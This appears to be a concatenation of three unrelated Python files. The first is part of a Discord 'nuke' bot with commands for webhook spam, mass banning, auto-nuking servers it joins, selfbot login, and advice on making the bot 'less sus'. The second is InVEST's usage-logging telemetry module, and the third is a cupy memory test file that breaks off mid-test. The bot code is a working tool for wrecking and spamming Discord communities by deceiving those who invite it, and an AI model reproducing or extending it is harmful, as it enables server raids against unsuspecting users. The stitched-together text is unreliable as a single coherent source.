settings['webhook_spam']['pfp_urls'].append(None)
await log(ctx, f'No pfp item has been added')
elif len(args) > 1 and (text := ' '.join(args[1:]).startswith(('https://', 'http://'))):
settings['webhook_spam']['pfp_urls'].append(text)
await log(ctx, f'URL added.')
else:
await log(ctx, f'Please enter an **image URL**. Note: the link must start with http(s) protocals. Or enter `none` for no pfp.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['pfp_urls'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['pfp_urls'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from pfp_urls.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam pfp_urls list', settings['webhook_spam']['pfp_urls'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
elif args[0] == 'contents' or args[0] == 'content':
if args[1] == 'add':
if len(args) > 1 and (0 < len(text := ' '.join(args[1:])) <= 2000):
settings['webhook_spam']['contents'].append(text)
await log(ctx, f'Text added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter something that has 1 to 2000 characters.')
elif args[1] == 'remove':
if len(args) > 2:
del args[0], args[0]
offset = 1
initial_length = len(settings['webhook_spam']['contents'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['webhook_spam']['contents'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from contents.')
elif args[1] == 'list':
await embed_list(args[2] if len(args) > 2 else '1', 'webhook_spam contents list', settings['webhook_spam']['contents'])
else:
await log(ctx, f'Unknown operation: `{args[1]}`')
else:
await log(ctx, f'Unknown type: `{args[0]}`')
elif command == 'after':
if args is None:
status_list = []
features_list = []
features_list.append('after')
if len(settings['after']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'After commands',
description = f'All the commands in this list will run after `{settings["command_prefix"]}nuke`. It can be disabled by adding "false" after the nuke command: `{settings["command_prefix"]}nuke false`.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`after add <command>` - add command to the back of the command list\n\n`after remove <line number> [line number] [line...` - remove line(s) in the command list\n\n`after insert <line number> <command>` - insert command after the given line. Note: use `insert 0 <command>` to insert the command to the first line\n\n`after list [page number]` - list commands that are in the command list', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['after'].append(text)
await log(ctx, f'Command added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the command you want to add after line `{len(settings["after"])}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['after'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['after'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter the line(s) that you want to remove from after commands.')
elif args[0] == 'insert':
if len(args) > 2 and args[1].isdigit():
if not (0 <= (index := int(args[1])) <= len(settings['after'])) or len(settings['after']) == 0:
await log(ctx, f'Line `{args[1]}` doesn\'t exist.')
return
settings['after'].insert(index, ' '.join(args[2:]))
await log(ctx, f'Added command after line `{args[1]}`.')
else:
await log(ctx, 'Insert usage: `after insert <after line #> <command...>`')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'after command(s) list', settings['after'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'bot_status':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_status',
description = f'Whenever the bot boot up the status will be set to a given status.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value=f'{settings["bot_status"]}', inline=True)
embed.add_field(name='Features', value='bot_status', inline=True)
embed.add_field(name='Usage', value=f'`bot_status <on start status>` - set the on start status. Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`. By default it is set to `offline`.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if (args := args.lower()) in ['online', 'offline', 'idle', 'dnd', 'do_not_disturb']:
settings['bot_status'] = args
await log(ctx, 'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'Available on start status are `online`, `offline`, `idle`, and `dnd` or `do_not_disturb`.')
elif command == 'bot_permission':
if args is None:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'bot_permission',
description = f'If you are using a selfbot, then you don\'t have to do anything to this section. This bot_permission section is for normal bot invite URL that will ask the person inviting it for permission/roles (ex. admin, server manager). The default is set to 2146958847, which asks for all permissions. If you want to make the bot less sus, you can remove the permissions that are not needed.\n\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Value', value=f'{settings["bot_permission"]}', inline=True)
embed.add_field(name='Features', value='bot_permission', inline=True)
embed.add_field(name='Usage', value=f'`bot_permission <value>` - set permissions value to the given number. Use this [permission calculator](https://wizbot.cc/permissions-calculator/?v=0) to help you calculate the values. Note: if you are going to use that calculator all you need is to copy the number that is display at the top, and then use this command.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= int(args) <= 2146958847:
settings['bot_permission'] = args
await log(ctx, 'Bot permission has been set to `{args}`.')
else:
await log(ctx, 'Please enter a value between 0 and 2146958847.')
elif command == 'save':
def check(message: discord.Message):
return message.author.id == ctx.message.author.id
if args is None:
await log(ctx, f'You need to name the file. Use `{settings["command_prefix"]}save <file name>`.')
return
parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(parent_dir, args.translate(bad_filename_map))
if os.path.isfile(config_path):
await log(ctx, f'Configuration file named {args} already exist. Do you want to overwrite it? [Y/n]')
while True:
try:
msg = (await client.wait_for('message', check=check, timeout=10)).content.lower()
if msg == 'y' or msg == 'yes':
with open(config_path, 'w') as f:
f.write(json.dumps(settings))
break
elif msg == 'n' or msg == 'no':
await log(ctx, f'Saving cancelled.')
return
await log(ctx, f'Yes or no.')
except (asyncio.exceptions.TimeoutError, discord.ext.commands.errors.CommandInvokeError):
await log(ctx, "Took too long to answer.")
return
else:
if not os.path.isdir(parent_dir):
os.mkdir(parent_dir)
with open(config_path, 'w+') as f:
f.write(json.dumps(settings))
global settings_copy
settings_copy = deepcopy(settings)
await log(ctx, 'Finished saving.')
elif command == 'verbose':
if args is None:
status_list = []
features_list = []
# hard coding this because I don't think there's a better way to set the values.
features_list.append('Log response from requests')
if want_log_request:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in console')
if want_log_console:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log messages in discord chat')
if want_log_message:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
features_list.append('Log any errors')
if want_log_errors:
status_list.append(':white_check_mark:')
else:
status_list.append(':x:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'verbose',
description = f'Verbose is the log level. Meaning that if you don\'t want any one of the logs to spam rate limiting errors or whatever errors that the bot is going to throw at you, you can disable them to prevent some lag.\n\nCurrent verbose value: `{str(settings["verbose"])}`\n:white_check_mark: = Enabled\n:x: = Disabled\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Logs', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`verbose <value>` - enable and disable the logs. Subtracting the values below from the current verbose to disable the log(s) you want, and adding the values will enable them. For example if I want to disable "Log any error" I will subtract 8 from 15 to get 7 and use 7 as the new verbose value to set, if I want to disable more like "Log response from request" I will substract 1 from 7 to get 6. To enable them back just add 8 and 1 to the current verbose value.\n\n`1` - Log response from requests\n`2` - Log messages in console\n`4`- Log messages in discord chat\n`8` - Log any errors.', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
if args.isdigit() and 0 <= (args := int(args)) <= 15:
settings['verbose'] = args
updateVerbose()
await log(ctx, 'On bot start status has been set to `{args}`.')
else:
await log(ctx, 'You can only enter a positve integer between or on 0 and 15.')
elif command == 'ban_whitelist':
if args is None:
status_list = []
features_list = []
features_list.append('ban_whitelist')
if len(settings['ban_whitelist']) == 0:
status_list.append(':x:')
else:
status_list.append(':white_check_mark:')
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = 'Ban whitelist',
description = f'Ban whitelist is used for telling `{settings["command_prefix"]}banAll` and `{settings["command_prefix"]}nuke` to not ban the users in the list. You can put discord tag or discord ID in the list, but it is recommended to use discord ID because in the pass there has some uncheckable discord tags.\n\n:white_check_mark: = Ready to use\n:x: = Needs to config\ncolor: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Status', value='\n'.join(status_list), inline=True)
embed.add_field(name='Features', value='\n'.join(features_list), inline=True)
embed.add_field(name='Usage', value=f'`ban_whitelist add <command>` - add user to the back of the command list\n\n`ban_whitelist remove <line number> [line number] [line...` - remove line(s) in the ban whitelist\n\n`ban_whitelist list [page number]` - list users that are in the ban whitelist', inline=False)
embed.set_footer(text=f'Config is saved' if configIsSaved() else '(*)Config is not saved')
await ctx.send(embed=embed)
else:
args = args.split()
if args[0] == 'add':
if len(args) > 1:
text = ' '.join(args[1:])
settings['ban_whitelist'].append(text)
await log(ctx, f'User added. Character length: `{str(len(text))}`.')
else:
await log(ctx, f'Please enter the userID or userTag that you want to add after line `{str(len(settings["after"]))}`.')
elif args[0] == 'remove':
if len(args) > 1:
del args[0]
offset = 1
initial_length = len(settings['ban_whitelist'])
for item in args:
if item.isdigit() and (0 <= (item := int(item)) - offset <= initial_length - offset):
del settings['ban_whitelist'][item - offset]
offset += 1
else:
await log(ctx, f'Skipped deleting line `{item}` -> not an integer between 1 and {str(initial_length)}.')
await log(ctx, f'Successfully removed `{str(offset - 1)}` items.')
else:
await log(ctx, f'Enter line(s) to remove from usernames.')
elif args[0] == 'list':
await embed_list(args[1] if len(args) > 1 else '1', 'ban whitelist', settings['ban_whitelist'])
else:
await log(ctx, f'Unknown operation: `{args[0]}`')
elif command == 'proxies':
await log(ctx, 'This feature has been disable for now due to unhandled slow/bad proxies.')
elif command == 'prefix' or command == 'command_prefix':
if args is None:
await log(ctx, f'Use `` {command_prefix}config command_prefix <command_prefix> ``')
else:
settings['command_prefix'] = client.command_prefix = args
await log(ctx, 'Command prefix changed.')
elif command == 'token':
if args is None:
await log(ctx, 'Usage: `token <new token>` - new token for this config. Restarting the bot will be required. And remember to save the config before restarting.')
else:
settings['token'] = args
await log(ctx, 'New token has been set.')
else:
await log(ctx, f'Unable to find the config. `{command}`')
## Additional functions ##
@commands.check(checkPerm)
@client.command(name='checkRolePermissions', aliases=['check', 'crp'])
async def checkRolePermissions(ctx, name, n='1'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
member_ = containing(selected_server.members, nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to found {name}.')
return
value = member_.guild_permissions.value
temp = sorted(member_.guild_permissions, key=lambda p: p)
master_list = ''
item_length = 31
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item, has_perm = temp[i]
if has_perm:
master_list += ':white_check_mark: '
else:
master_list += ':x: '
master_list += item.replace('_', ' ').capitalize() + '\n'
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog('\n%s*Check role permissions*\n%sPermission value -> %s%d : 2147483647\n%s %s%d/%d' % (Fore.CYAN, Fore.RESET, Fore.YELLOW, value, master_list.replace(':white_check_mark:', f'{Fore.GREEN}+').replace(':x:', f'{Fore.RED}-'), Fore.YELLOW, n+1, ceil(item_length / per_page)), True)
# else:
try:
embed = discord.Embed(
title = 'User permissions',
description = f'Encoded value: {str(value)} : 2147483647',
color = discord.Color.red()
)
embed.add_field(name='Permissions', value=master_list, inline=True)
embed.set_footer(text=f'{str(n+1)}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
await ctx.send('```diff\n%s %d/%d```' % (master_list.replace(':white_check_mark:', '+').replace(':x:', '-'), n+1, ceil(item_length / per_page)))
@commands.check(checkPerm)
@client.command(name='serverIcon', aliases=['si', 'changeServerIcon'])
async def serverIcon(ctx, path=None):
if not await hasTarget(ctx):
return
if path is None:
await selected_server.edit(icon=None)
await log(ctx, f'Successfully removed the server icon from `{selected_server.name}`.')
elif path.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
await selected_server.edit(icon=BytesIO(requests.get(path).content).read())
consoleLog('Successfully changed the current server icon.')
except:
consoleLog(f'Unable to change the server icon to "{path}".')
elif path[0] == '<': # EX: <a:triggeredd:627060014431076352>
path = path.split(':')
try:
if path[0] == '<a': # Animated
await selected_server.edit(icon=discord.File(BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.gif?v=1').content).read()))
else:
await selected_server.edit(icon=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{path[2][:-1]}.png?v=1').content).read())
await log(ctx, 'Successfully changed server icon.')
except:
raise
elif os.path.isfile(path): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(path, 'rb') as data:
await selected_server.edit(icon=data.read())
await log(ctx, 'Successfully changed server icon.')
else:
try:
unicode_number = str(ord(path)) + ', '
except:
unicode_number = ''
unicode_string = path.encode('utf8')
sys.stdout.buffer.write(f'"{path}" is not supported to be set as a server icon.'.encode('utf8'))
consoleLog(unicode_number)
await log(ctx, f'{path} is not supported to be set as a server icon.')
await log(ctx, f'Character\'s bytes: {unicode_number}{unicode_string}')
@commands.check(checkPerm)
@client.command(name='serverName', aliases=['sn', 'changeServerName'])
async def serverName(ctx, *, name):
if not await hasTarget(ctx):
return
try:
await selected_server.edit(name=name)
await log(ctx, f'Server name has been changed to `{name}`.')
except discord.errors.Forbidden:
await log(ctx, 'Unable to change server name.')
raise
except:
raise
@commands.check(checkPerm)
@client.command(name='purge', aliases=['clear'])
async def purge(ctx, n=None):
if not await hasTarget(ctx):
return
consoleLog('Purging messages...', True)
if n is not None and (not n.isdigit() or (n := int(n)) < 1):
await log(ctx, 'Please enter a positive integer.')
return
to_delete_messages = await ctx.channel.history(limit=n).flatten()
consoleLog('Due to discord ratelimitings purging messages cannot be run in a fast pace. After every message the bot will timeout for 3 seconds', True)
delay_time = 0
for message in to_delete_messages:
while True:
await asyncio.sleep(delay_time)
r = requests.delete(f'https://discord.com/api/v8/channels/{ctx.channel.id}/messages/{message.id}', headers=headers)
if r.status_code == 429:
delay_time = r.json()['retry_after']
consoleLog(f'ratelimiting reached. Purging delay has been set to -> {str(delay_time)} seconds')
else:
break
@commands.check(checkPerm)
@client.command(name='leave')
async def leave(ctx, name=None):
if name is None:
if not await hasTarget(ctx):
return
await selected_server.leave()
else:
server = containing(client.guilds, name)
if server is None:
await log(ctx, f'Unable to find server {name}.')
return
await server.leave()
if not isDM(ctx) and ctx.guild.id == selected_server.id:
consoleLog(f'{Fore.BLUE}Goodbye {selected_server.name}! {Fore.YELLOW}-> {Fore.GREEN}Left {Fore.RESET}{selected_server.name}.', True)
else:
await log(ctx, f'Goodbye {selected_server.name}! -> Left {selected_server.name}.')
@commands.check(checkPerm)
@client.command(name='leaveAll')
async def leaveAll(ctx):
await log(ctx, 'Leaving all servers. Note: You won\'t be able to message me after I left all servers.')
for server in client.guilds:
await server.leave()
consoleLog('Left all servers.', True)
@commands.check(checkPerm)
@client.command(name='joinNuke', aliases=['nukeOnJoin', 'join nuke'])
async def joinNuke(ctx, true_or_false):
global saved_ctx, nuke_on_join
if true_or_false.lower() == 'true':
saved_ctx = ctx
nuke_on_join = True
await log(ctx, 'Nuke on bot joining a new server has been turned on.')
elif true_or_false.lower() == 'false':
nuke_on_join = False
await log(ctx, 'Nuke on bot joining a new server has been turned off.')
else:
await log(ctx, 'Invalid flag: true or false. Note: true or false is not case sensitive.')
@commands.check(checkPerm)
@client.command(name='changeStatus', aliases=['cs'])
async def changeStatus(ctx, status):
if status == 'offline':
await client.change_presence(status=discord.Status.offline)
elif status == 'invisible':
await client.change_presence(status=discord.Status.invisible)
elif status == 'online':
await client.change_presence(status=discord.Status.online)
elif status == 'idle':
await client.change_presence(status=discord.Status.idle)
elif status == 'dnd' or status == 'do_not_disturb':
await client.change_presence(status=discord.Status.do_not_disturb)
@commands.check(checkPerm)
@client.command(name='link', aliases=['l'])
async def link(ctx):
if not is_selfbot:
await ctx.channel.send(f'https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
else:
await log(ctx, f'This account is not a bot :). You can join servers with invite codes.')
@commands.check(checkPerm)
@client.command(name='autoNick', aliases=['an'])
async def autoNick(ctx):
if not await hasTarget(ctx):
return
global auto_nick
if not auto_nick:
consoleLog(f'{Fore.CYAN}Auto nickname is on.', True)
auto_nick = True
while auto_nick:
# payload = {'nick': ''.join(choice(alphanum) for _ in range(10))}
# q.put((requests.patch, f'https://discord.com/api/v8/guilds/{selected_server.id}/members/%40me/nick', headers, payload))
await selected_server.me.edit(nick=''.join(choices(alphanum, k=10)))
else:
consoleLog(f'{Fore.BLUE}Auto nickname is off.', True)
auto_nick = False
@commands.check(checkPerm)
@client.command(name='autoStatus', aliases=['as'])
async def autoStatus(ctx):
global auto_status
if not auto_status:
consoleLog(f'{Fore.CYAN}Auto status is on.', True)
auto_status = True
while auto_status:
await client.change_presence(status=discord.Status.online)
await asyncio.sleep(random() + 0.3) # Theres a rate limit for changing status every minute or 5 minutes i havent figure out the exact number but ill stay with this sleep commmand
await client.change_presence(status=discord.Status.offline)
await asyncio.sleep(random() + 0.3)
else:
consoleLog(f'{Fore.BLUE}Auto status is off.', True)
auto_status = False
@commands.check(checkPerm)
@client.command(name='off', aliases=['logout', 'logoff', 'shutdown', 'stop'])
async def off(ctx):
### Discord takes too long to realize if the bot is offline people might get confused about the not turning off the bot vs discord takes time to update
await changeStatus(None, 'offline')
await client.logout()
###### Closing handler ######
###### https://github.com/aio-libs/aiohttp/issues/4324
from functools import wraps
from asyncio.proactor_events import _ProactorBasePipeTransport
def silence_event_loop_closed(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except RuntimeError as e:
if str(e) != 'Event loop is closed':
raise
return wrapper
_ProactorBasePipeTransport.__del__ = silence_event_loop_closed(_ProactorBasePipeTransport.__del__)
# PrivilegedIntents fixed fail :')
# async def login():
# global client
# try:
# await client.start(settings['token'], bot=not is_selfbot)
# except discord.PrivilegedIntentsRequired:
# print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
# # exit()
# client._connection = client._get_state(
# intents=client.intents.default()
# ) # reset intents to default
# input('lol')
# await login()
# except Exception as e:
# print(e)
# finally:
# sys.stdout.write('Exiting... \n')
# asyncio.run(login()) # if login failed because of the privileged intents then ask if user wants to turn off the intents
try:
client.run(settings['token'], bot=not is_selfbot)
except discord.PrivilegedIntentsRequired:
print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
exit()
except Exception as e:
print(e)
finally:
sys.stdout.write('Exiting... \n')
|
usage.py | """Module to that provides functions for usage logging."""
import contextlib
import hashlib
import json
import locale
import logging
import os
import platform
import sys
import threading
import traceback
import uuid
import importlib
from urllib.request import urlopen, Request
from urllib.parse import urlencode
from osgeo import gdal
from osgeo import osr
import natcap.invest
import pygeoprocessing
from .. import utils
ENCODING = sys.getfilesystemencoding()
LOGGER = logging.getLogger(__name__)
_ENDPOINTS_INDEX_URL = (
'http://data.naturalcapitalproject.org/server_registry/'
'invest_usage_logger_v2/index.html')
# This is defined here because it's very useful to know the thread name ahead
# of time so we can exclude any log messages it generates from the logging.
# Python doesn't care about having multiple threads have the same name.
_USAGE_LOGGING_THREAD_NAME = 'usage-logging-thread'
@contextlib.contextmanager
def log_run(module, args):
"""Context manager to log an InVEST model run and exit status.
Args:
module (string): The string module name that identifies the model.
args (dict): The full args dictionary.
Returns:
``None``
"""
session_id = str(uuid.uuid4())
log_thread = threading.Thread(
target=_log_model, args=(module, args, session_id),
name=_USAGE_LOGGING_THREAD_NAME)
log_thread.start()
try:
yield
except Exception:
exit_status_message = traceback.format_exc()
raise
else:
exit_status_message = ':)'
finally:
log_exit_thread = threading.Thread(
target=_log_exit_status, args=(session_id, exit_status_message),
name=_USAGE_LOGGING_THREAD_NAME)
log_exit_thread.start()
def _calculate_args_bounding_box(args, args_spec):
"""Calculate the bounding boxes of any GIS types found in `args_dict`.
Args:
args (dict): a string key and any value pair dictionary.
args_spec (dict): the model ARGS_SPEC describing args
Returns:
bb_intersection, bb_union tuple that's either the lat/lng bounding
intersection and union bounding boxes of the gis types referred to
in args_dict. If no GIS types are present, this is a (None, None)
tuple.
"""
def _merge_bounding_boxes(bb1, bb2, mode):
"""Merge two bounding boxes through union or intersection.
Args:
bb1 (list of float): bounding box of the form
[minx, maxy, maxx, miny] or None
bb2 (list of float): bounding box of the form
[minx, maxy, maxx, miny] or None
mode (string): either "union" or "intersection" indicating the
how to combine the two bounding boxes.
Returns:
either the intersection or union of bb1 and bb2 depending
on mode. If either bb1 or bb2 is None, the other is returned.
If both are None, None is returned.
"""
if bb1 is None:
return bb2
if bb2 is None:
return bb1
if mode == "union":
comparison_ops = [min, max, max, min]
if mode == "intersection":
comparison_ops = [max, min, min, max]
bb_out = [op(x, y) for op, x, y in zip(comparison_ops, bb1, bb2)]
return bb_out
bb_intersection = None
bb_union = None
for key, value in args.items():
# Using gdal.OpenEx to check if an input is spatial caused the
# model to hang sometimes (possible race condition), so only
# get the bounding box of inputs that are known to be spatial.
spatial_info = None
if args_spec['args'][key]['type'] == 'raster':
spatial_info = pygeoprocessing.get_raster_info(value)
elif args_spec['args'][key]['type'] == 'vector':
spatial_info = pygeoprocessing.get_vector_info(value)
if spatial_info:
local_bb = spatial_info['bounding_box']
projection_wkt = spatial_info['projection_wkt']
spatial_ref = osr.SpatialReference()
spatial_ref.ImportFromWkt(projection_wkt)
try:
# means there's a GIS type with a well defined bounding box
# create transform, and reproject local bounding box to
# lat/lng
lat_lng_ref = osr.SpatialReference()
lat_lng_ref.ImportFromEPSG(4326) # EPSG 4326 is lat/lng
to_lat_trans = utils.create_coordinate_transformer(
spatial_ref, lat_lng_ref)
for point_index in [0, 2]:
local_bb[point_index], local_bb[point_index + 1], _ = (
to_lat_trans.TransformPoint(
local_bb[point_index],
local_bb[point_index+1]))
bb_intersection = _merge_bounding_boxes(
local_bb, bb_intersection, 'intersection')
bb_union = _merge_bounding_boxes(
local_bb, bb_union, 'union')
except Exception as transform_error:
# All kinds of exceptions from bad transforms or CSV files
# or dbf files could get us to this point, just don't
# bother with the local_bb at all
LOGGER.exception('Error when transforming coordinates: %s',
transform_error)
else:
LOGGER.debug(f'Arg {key} of type {args_spec["args"][key]["type"]} '
'excluded from bounding box calculation')
return bb_intersection, bb_union
def _log_exit_status(session_id, status):
"""Log the completion of a model with the given status.
Args:
session_id (string): a unique string that can be used to identify
the current session between the model initial start and exit.
status (string): a string describing the exit status of the model,
'success' would indicate the successful completion while an
exception string could indicate a failure.
Returns:
None
"""
logger = logging.getLogger('natcap.invest.ui.usage._log_exit_status')
try:
payload = {
'session_id': session_id,
'status': status,
}
log_finish_url = json.loads(urlopen(
_ENDPOINTS_INDEX_URL).read().strip())['FINISH']
# The data must be a python string of bytes. This will be ``bytes``
# in python3.
urlopen(Request(log_finish_url, urlencode(payload).encode('utf-8')))
except Exception as exception:
# An exception was thrown, we don't care.
logger.warn(
'an exception encountered when _log_exit_status %s',
str(exception))
def _log_model(model_name, model_args, session_id=None):
"""Log information about a model run to a remote server.
Args:
model_name (string): a python string of the package version.
model_args (dict): the traditional InVEST argument dictionary.
Returns:
None
"""
logger = logging.getLogger('natcap.invest.ui.usage._log_model')
def _node_hash():
"""Return a hash for the current computational node."""
data = {
'os': platform.platform(),
'hostname': platform.node(),
'userdir': os.path.expanduser('~')
}
md5 = hashlib.md5()
# a json dump will handle non-ascii encodings
# but then data must be encoded before hashing in Python 3.
md5.update(json.dumps(data).encode('utf-8'))
return md5.hexdigest()
args_spec = importlib.import_module(model_name).ARGS_SPEC
try:
bounding_box_intersection, bounding_box_union = (
_calculate_args_bounding_box(model_args, args_spec))
payload = {
'model_name': model_name,
'invest_release': natcap.invest.__version__,
'node_hash': _node_hash(),
'system_full_platform_string': platform.platform(),
'system_preferred_encoding': locale.getdefaultlocale()[1],
'system_default_language': locale.getdefaultlocale()[0],
'bounding_box_intersection': str(bounding_box_intersection),
'bounding_box_union': str(bounding_box_union),
'session_id': session_id,
}
log_start_url = json.loads(urlopen(
_ENDPOINTS_INDEX_URL).read().strip())['START']
# The data must be a python string of bytes. This will be ``bytes``
# in python3.
urlopen(Request(log_start_url, urlencode(payload).encode('utf-8')))
except Exception as exception:
# An exception was thrown, we don't care.
logger.warn(
'an exception encountered when logging %s', repr(exception))
|
test_memory.py | import ctypes
import gc
import pickle
import sys
import threading
import unittest
import fastrlock
import cupy.cuda
from cupy.cuda import device
from cupy.cuda import memory
from cupy.cuda import stream as stream_module
from cupy import testing
class MockMemory(memory.Memory):
cur_ptr = 1
def __init__(self, size):
self.ptr = MockMemory.cur_ptr
MockMemory.cur_ptr += size
self.size = size
self.device_id = 0
def __del__(self):
self.ptr = 0
pass
def mock_alloc(size):
mem = MockMemory(size)
return memory.MemoryPointer(mem, 0)
class TestUnownedMemoryClass(unittest.TestCase):
def test_inherits_base_memory(self):
assert issubclass(memory.UnownedMemory, memory.BaseMemory)
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
'specify_device_id': [True, False],
}))
@testing.gpu
class TestUnownedMemory(unittest.TestCase):
def check(self, device_id):
size = 24
shape = (2, 3)
dtype = cupy.float32
with device.Device(device_id):
src_mem_ptr = self.allocator(size)
src_ptr = src_mem_ptr.ptr
args = (src_ptr, size, src_mem_ptr)
kwargs = {}
if self.specify_device_id:
kwargs = {'device_id': device_id}
unowned_mem = memory.UnownedMemory(*args, **kwargs)
assert unowned_mem.size == size
assert unowned_mem.ptr == src_ptr
assert unowned_mem.device_id == device_id
arr = cupy.ndarray(shape, dtype, memory.MemoryPointer(unowned_mem, 0))
# Delete the source object
del src_mem_ptr
with device.Device(device_id):
arr[:] = 2
assert (arr == 2).all()
def test_device0(self):
self.check(0)
@testing.multi_gpu(2)
def test_device1(self):
self.check(1)
@testing.gpu
class TestMemoryPointer(unittest.TestCase):
def test_int(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(1)
self.assertEqual(pval, int(memptr))
def test_add(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8)
memptr2 = memptr + 4
self.assertIsInstance(memptr2, memory.MemoryPointer)
self.assertEqual(pval + 4, int(memptr2))
memptr3 = 4 + memptr
self.assertIsInstance(memptr3, memory.MemoryPointer)
self.assertEqual(pval + 4, int(memptr3))
memptr += 4
self.assertIsInstance(memptr, memory.MemoryPointer)
self.assertEqual(pval + 4, int(memptr))
def test_sub(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8) + 4
memptr2 = memptr - 4
self.assertIsInstance(memptr2, memory.MemoryPointer)
self.assertEqual(pval, int(memptr2))
memptr -= 4
self.assertIsInstance(memptr, memory.MemoryPointer)
self.assertEqual(pval, int(memptr))
def test_copy_to_and_from_host(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
self.assertEqual(b_cpu.value, a_cpu.value)
def test_copy_from_device(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
self.assertEqual(b_cpu.value, a_cpu.value)
def test_memset(self):
a_gpu = memory.alloc(4)
a_gpu.memset(1, 4)
a_cpu = ctypes.c_ubyte()
for i in range(4):
